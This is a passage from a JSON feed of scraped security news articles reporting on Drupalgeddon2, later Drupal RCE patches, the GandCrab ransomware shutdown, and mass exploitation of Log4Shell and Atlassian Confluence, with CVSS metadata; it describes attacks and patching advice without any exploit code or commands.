{}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigating to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a users\u2019 access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows and external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users to visiting third party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:46:10", "description": "The GandCrab ransomware group is shutting down, according to posts on the Dark Web.\n\nResearchers David Montenegro and Damian [spotted the announcements](<https://twitter.com/Damian1338B/status/1134723204566700033>) over the weekend.\n\n> Start of GandCrab Ransomware : 28-1-2018 .. \ud83e\udd80\ud83e\udd80\ud83e\udd80 \nClose of GandCrab Ransomware : 1-6-2019 .. \u2620\ufe0f\u2620\ufe0f\u2620\ufe0f[@Raj_Samani](<https://twitter.com/Raj_Samani?ref_src=twsrc%5Etfw>) [@ValthekOn](<https://twitter.com/ValthekOn?ref_src=twsrc%5Etfw>) [@John_Fokker](<https://twitter.com/John_Fokker?ref_src=twsrc%5Etfw>) [@hasherezade](<https://twitter.com/hasherezade?ref_src=twsrc%5Etfw>) [@VK_Intel](<https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw>) [@James_inthe_box](<https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw>) [@luca_nagy_](<https://twitter.com/luca_nagy_?ref_src=twsrc%5Etfw>) [@Bitdefender](<https://twitter.com/Bitdefender?ref_src=twsrc%5Etfw>) [@Europol](<https://twitter.com/Europol?ref_src=twsrc%5Etfw>) [@campuscodi](<https://twitter.com/campuscodi?ref_src=twsrc%5Etfw>) [@tamas_boczan](<https://twitter.com/tamas_boczan?ref_src=twsrc%5Etfw>) [@JayTHL](<https://twitter.com/JayTHL?ref_src=twsrc%5Etfw>) [@demonslay335](<https://twitter.com/demonslay335?ref_src=twsrc%5Etfw>) [@struppigel](<https://twitter.com/struppigel?ref_src=twsrc%5Etfw>) [pic.twitter.com/kkrhKUunDX](<https://t.co/kkrhKUunDX>)\n> \n> \u2014 CryptoInsane (@CryptoInsane) [June 1, 2019](<https://twitter.com/CryptoInsane/status/1134727041826377729?ref_src=twsrc%5Etfw>)\n\nNoting that \u201call good things come to an end,\u201d GandCrab\u2019s operators in a posting on the exploit[.]in underground market claim the malware has raked in nearly $2 billion since the ransomware launched in January of last year. That encompasses ransomware-as-a-service (RaaS) earnings as well as $150 million for the operators themselves. They said they were averaging $2.5 million per week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nYet, despite all of this success \u2013 and perhaps due to more [GandCrab decryptors](<https://www.nomoreransom.org/en/decryption-tools.html>) popping up to [help businesses combat infections](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) \u2013 the group said that it is suspending their servers, ads and infrastructure.\n\nThe operators also warned, \u201cVictims, if you buy, now. Then your data no one will recover. Keys will be deleted.\u201d\n\nMichael Gillespie, Emsisoft researcher and creator of the ID Ransomware service, told Threatpost: \u201cThe number of GrandCrab submissions to ID Ransomware has been trending downwards for some time. I think they\u2019re doing like the TeslaCrypt devs; getting out while the going is good and sailing away on their yachts. Unfortunately, no-one will ever be able to decrypt unless the criminals release the keys for the more recent variants.\u201d\n\n## GandCrab: A Swiftly Moving Malware\n\nGandCrab is a fairly standard ransomware in that it scans infected Windows systems and any network shares for files to encrypt. It\u2019s recognizable by the \u201c.gdcb\u201d extension that it appends to encrypted files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/03101107/GrandCrab-Closing-Message.png>)\n\nYet in the 16 months since its debut, it has become [one of the most prolific ransomware strains](<https://threatpost.com/banking-trojans-top-threat-email/141814/>) out there, as GandCrab\u2019s operators have also continued to evolve its code (there are five versions) and [infection vectors](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>).\n\nThose operators specialized in the RaaS model, according to researchers, and partnering with botnet operators and other affiliate cybercriminals \u2013 which helps account for its widespread virulence. It spreads in various ways, including via spam emails, exploit kits, targeted social engineering efforts, fake software downloads and malicious websites; and it was recently spotted as the final payload for [a series of attacks](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) that exploit the recently patched, critical Oracle WebLogic bug, CVE-2019-2725.\n\nSome attackers have customized the code as well; recently for example Bromium [identified](<https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image>) a new PowerShell technique being used to spread GandCrab that uses Excel documents and an image of Super Mario to infect machines. It only attacked Windows computers in Italy, and was coded to not execute if the infection landed in a different geography.\n\n\u201cAnalysis showed PowerShell code launching from malicious Excel spreadsheets, which are freshly rewrapped to avoid detection by signature-based security tools,\u201d Bromium explained in its blog on the campaign, in May. \u201cThe script is then used to download a picture of Super Mario which contains more PowerShell code that ultimately downloads GandCrab ransomware, encrypting files and network assets. By hiding the ransomware within images, it makes it nearly impossible for perimeter detection to work out if there is something malicious within the code.\u201d\n\nDespite their successful 16-month run, GandCrab\u2019s operators are ready to retire, they said.\n\n\u201cWe successfully cashed this money and legalized it in various spheres of white business,\u201d they posted. \u201cWe are leaving for a well-deserved retirement. We have proven that by doing evil deeds, retribution does not come. We proved that in a year, you can earn money for a lifetime.\u201d\n", "cvss3": {}, "published": "2019-06-03T14:18:01", "type": "threatpost", "title": "GandCrab Ransomware Shutters Its Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-03T14:18:01", "id": "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "href": "https://threatpost.com/gandcrab-ransomware-shutters/145267/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. \"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and 